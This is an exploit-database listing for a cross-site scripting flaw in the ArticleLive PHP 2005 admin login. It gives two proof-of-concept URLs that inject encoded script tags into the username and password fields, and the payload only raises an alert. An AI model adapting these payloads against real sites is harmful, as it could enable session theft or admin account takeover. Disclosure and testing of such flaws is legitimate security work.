[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

ArticleLive PHP Version 2005.0.0 Cross Site Scripting Vulnerability

Author
indoushka
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-10516
Category
web applications
Date add
30-12-2009
Platform
unsorted
===================================================================
ArticleLive PHP Version 2005.0.0 Cross Site Scripting Vulnerability
===================================================================

========================================================================================                 
| # Title    : ArticleLive PHP Version 2005.0.0 Cross Site Scripting Vulnerability     |
| # Author   : indoushka                                                               |
| # Script   : Interspire ArticleLive 2005 Copyright Interspire                        |
| # Tested on: windows SP2 Fran?ais V.(Pnx2 2.0) + Lunix Fran?ais v.(9.4 Ubuntu)       |
| # Bug      : XSS                                                                     |
======================      Exploit By indoushka       =================================
| # Exploit  :
|
| 1- http://127.0.0.1/lgc-alpn/admin/index.php?ToDo=processLogin?username=>"><ScRiPt%20%0a%0d>alert(213771818860)%3B</ScRiPt>&password=indoushka&SubmitButton=Login
| 2- http://127.0.0.1/lgc-alpn/admin/index.php?ToDo=processLogin?username=test&password=>"><ScRiPt%20%0a%0d>alert(213771818860)%3B</ScRiPt>&SubmitButton=Login



#  0day.today [2024-12-26]  #